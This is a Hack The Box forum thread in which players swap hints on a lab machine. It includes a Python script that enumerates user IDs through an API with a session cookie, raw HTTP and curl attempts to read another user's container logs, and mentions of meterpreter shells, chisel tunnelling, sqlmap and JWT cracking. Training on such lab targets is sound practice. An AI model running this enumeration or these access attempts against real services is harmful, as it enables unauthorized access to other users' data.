Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 2:03 AM i'm Still Trying To Brute Force The Json Parms Gunna Try To Crack The Rest Of The Hashes Posts: 28 Threads: 0 Joined: N/A October 16, 2022 at 2:13 AM (October 16, 2022, 02:03 AM)vuln63 Wrote: i'm Still Trying To Brute Force The Json Parms Gunna Try To Crack The Rest Of The Hashes HTB is not about brute. Find the library and framework are used in backend and just google it. Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 2:18 AM I Wrote This Function To See If Theres Any Hidden User Accouts On The Web Server But Nothing def userid(): ids = [] headers = {"Cookie": "session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0tZqA.dyJU8OGeizFy7KORBeL1POCH3bc", "Content-Type": "application/json"} for i in range(1000): url = f'http://dev.rainycloud.htb/api/user/{i}.0' print(Fore.RED + f"Trying Userid: {i}") r = requests.get(url, headers=headers, verify=False) if "Not allowed to view other users info!" not in r.text and "{}" not in r.text: ids.append(i) print(Fore.YELLOW + f"Found Valid Userid: {i}") continue if "{}" in r.text and i == 999: print(Fore.YELLOW + ids)
(October 16, 2022, 02:13 AM)m4rsh3ll Wrote: (October 16, 2022, 02:03 AM)vuln63 Wrote: i'm Still Trying To Brute Force The Json Parms Gunna Try To Crack The Rest Of The Hashes
HTB is not about brute. Find the library and framework are used in backend and just google it. Thanks Man I'll Try It
Found A Url in a .js file https://stackoverflow.com/a/23054920/ Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 2:45 AM (October 16, 2022, 02:13 AM)m4rsh3ll Wrote: (October 16, 2022, 02:03 AM)vuln63 Wrote: i'm Still Trying To Brute Force The Json Parms Gunna Try To Crack The Rest Of The Hashes
HTB is not about brute. Find the library and framework are used in backend and just google it. did u root the box Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 5:01 AM I'm Checking Docker Registery For Source Code Posts: 9 Threads: 0 Joined: N/A October 16, 2022 at 8:29 AM This has nothing to do with brute.. maybe get an account... then you have access to containers.. and they obviously can run commands etc.. thats your initial foothold :) Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 10:53 AM (October 16, 2022, 08:29 AM)B00mer445 Wrote: This has nothing to do with brute.. maybe get an account... then you have access to containers.. and they obviously can run commands etc.. thats your initial foothold :) i already got a account as gary
and i created a docker container git a meterpreter shell on it and used chisel to tunell my way to get access to dev.rainycloud.htb Posts: 20 Threads: 0 Joined: N/A October 16, 2022 at 11:33 AM Posting here a thought, maybe helps anyone... When you are inside a container, seems like the /proc folder of the host is mounted, so we can basically see all the processes running. You will think, and why that would be useful, well there's a container named "Secrets" and the owner is "jack", we can read the logs with a POST request to /containers and the hash of the container, the thing is that we couldn't get the hash. BUT since we can read the processes, we can get the hash of the container, something like this 2022/10/16 11:26:08 CMD: UID=0 PID=9888 | /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 40003 -container-ip 172.18.0.5 -container-port 40003
2022/10/16 11:26:08 CMD: UID=0 PID=9824 | tail -f /logfile
2022/10/16 11:26:08 CMD: UID=0 PID=9802 | /usr/bin/containerd-shim-runc-v2 -namespace moby -id 307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a -address /run/containerd/containerd.sock
But when you try to read the logs of that container we have the "Unauthorized" response: POST /containers HTTP/1.1
Host: rainycloud.htb
Content-Length: 79
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Sec-GPC: 1
Accept-Language: en-GB,en;q=0.5
Origin: http://rainycloud.htb
Referer: http://rainycloud.htb/containers
Accept-Encoding: gzip, deflate
Cookie: session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo
Connection: close
action=logs&id=307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a
HTTP/1.1 403 FORBIDDEN
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 16 Oct 2022 11:28:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12
Connection: close
Vary: Cookie
Unauthorized
Playing around with this... Will post if I found anything new :D Edit1: Btw, I tried with the dev. VHOST, same response... ❯ proxychains curl -v http://dev.rainycloud.htb/containers -b 'session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo' -d 'action=logs&id=307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
* Trying 172.18.0.1:80...
* Connected to dev.rainycloud.htb (127.0.0.1) port 80 (#0)
> POST /containers HTTP/1.1
> Host: dev.rainycloud.htb
> User-Agent: curl/7.81.0
> Accept: */*
> Cookie: session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo
> Content-Length: 79
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 FORBIDDEN
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sun, 16 Oct 2022 11:29:30 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 12
< Connection: keep-alive
< Vary: Cookie
<
* Connection #0 to host dev.rainycloud.htb left intact
Unauthorized%
Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 11:51 AM (October 16, 2022, 11:33 AM)lnf02 Wrote: Posting here a thought, maybe helps anyone...
When you are inside a container, seems like the /proc folder of the host is mounted, so we can basically see all the processes running. You will think, and why that would be useful, well there's a container named "Secrets" and the owner is "jack", we can read the logs with a POST request to /containers and the hash of the container, the thing is that we couldn't get the hash. BUT since we can read the processes, we can get the hash of the container, something like this
2022/10/16 11:26:08 CMD: UID=0 PID=9888 | /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 40003 -container-ip 172.18.0.5 -container-port 40003
2022/10/16 11:26:08 CMD: UID=0 PID=9824 | tail -f /logfile
2022/10/16 11:26:08 CMD: UID=0 PID=9802 | /usr/bin/containerd-shim-runc-v2 -namespace moby -id 307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a -address /run/containerd/containerd.sock
But when you try to read the logs of that container we have the "Unauthorized" response:
POST /containers HTTP/1.1
Host: rainycloud.htb
Content-Length: 79
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Sec-GPC: 1
Accept-Language: en-GB,en;q=0.5
Origin: http://rainycloud.htb
Referer: http://rainycloud.htb/containers
Accept-Encoding: gzip, deflate
Cookie: session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo
Connection: close
action=logs&id=307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a
HTTP/1.1 403 FORBIDDEN
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 16 Oct 2022 11:28:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12
Connection: close
Vary: Cookie
Unauthorized
Playing around with this... Will post if I found anything new :D
Edit1: Btw, I tried with the dev. VHOST, same response...
❯ proxychains curl -v http://dev.rainycloud.htb/containers -b 'session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo' -d 'action=logs&id=307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
* Trying 172.18.0.1:80...
* Connected to dev.rainycloud.htb (127.0.0.1) port 80 (#0)
> POST /containers HTTP/1.1
> Host: dev.rainycloud.htb
> User-Agent: curl/7.81.0
> Accept: */*
> Cookie: session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo
> Content-Length: 79
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 FORBIDDEN
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sun, 16 Oct 2022 11:29:30 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 12
< Connection: keep-alive
< Vary: Cookie
<
* Connection #0 to host dev.rainycloud.htb left intact
Unauthorized%
yea i tryed that did u run pspy64 on the container I'm Trying To Crack The Secret To The Jwt Tokens So I Can Forge A Token I Just Started Running Sqlmap On Login Nothing So Far Posts: 20 Threads: 0 Joined: N/A October 16, 2022 at 11:56 AM (October 16, 2022, 11:51 AM)vuln63 Wrote: (October 16, 2022, 11:33 AM)lnf02 Wrote: Posting here a thought, maybe helps anyone...
When you are inside a container, seems like the /proc folder of the host is mounted, so we can basically see all the processes running. You will think, and why that would be useful, well there's a container named "Secrets" and the owner is "jack", we can read the logs with a POST request to /containers and the hash of the container, the thing is that we couldn't get the hash. BUT since we can read the processes, we can get the hash of the container, something like this
2022/10/16 11:26:08 CMD: UID=0 PID=9888 | /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 40003 -container-ip 172.18.0.5 -container-port 40003
2022/10/16 11:26:08 CMD: UID=0 PID=9824 | tail -f /logfile
2022/10/16 11:26:08 CMD: UID=0 PID=9802 | /usr/bin/containerd-shim-runc-v2 -namespace moby -id 307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a -address /run/containerd/containerd.sock
But when you try to read the logs of that container we have the "Unauthorized" response:
POST /containers HTTP/1.1
Host: rainycloud.htb
Content-Length: 79
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Sec-GPC: 1
Accept-Language: en-GB,en;q=0.5
Origin: http://rainycloud.htb
Referer: http://rainycloud.htb/containers
Accept-Encoding: gzip, deflate
Cookie: session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo
Connection: close
action=logs&id=307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a
HTTP/1.1 403 FORBIDDEN
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 16 Oct 2022 11:28:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12
Connection: close
Vary: Cookie
Unauthorized
Playing around with this... Will post if I found anything new :D
Edit1: Btw, I tried with the dev. VHOST, same response...
❯ proxychains curl -v http://dev.rainycloud.htb/containers -b 'session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo' -d 'action=logs&id=307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
* Trying 172.18.0.1:80...
* Connected to dev.rainycloud.htb (127.0.0.1) port 80 (#0)
> POST /containers HTTP/1.1
> Host: dev.rainycloud.htb
> User-Agent: curl/7.81.0
> Accept: */*
> Cookie: session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo
> Content-Length: 79
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 FORBIDDEN
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sun, 16 Oct 2022 11:29:30 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 12
< Connection: keep-alive
< Vary: Cookie
<
* Connection #0 to host dev.rainycloud.htb left intact
Unauthorized%
yea i tryed that did u run pspy64 on the container
I'm Trying To Crack The Secret To The Jwt Tokens So I Can Forge A Token I don't think that's the path... This machines looks more like playing with APIs and so on... Also, you can modify some values while creating the container, executing commands, reading logs, play around with - -- and --- ;) |
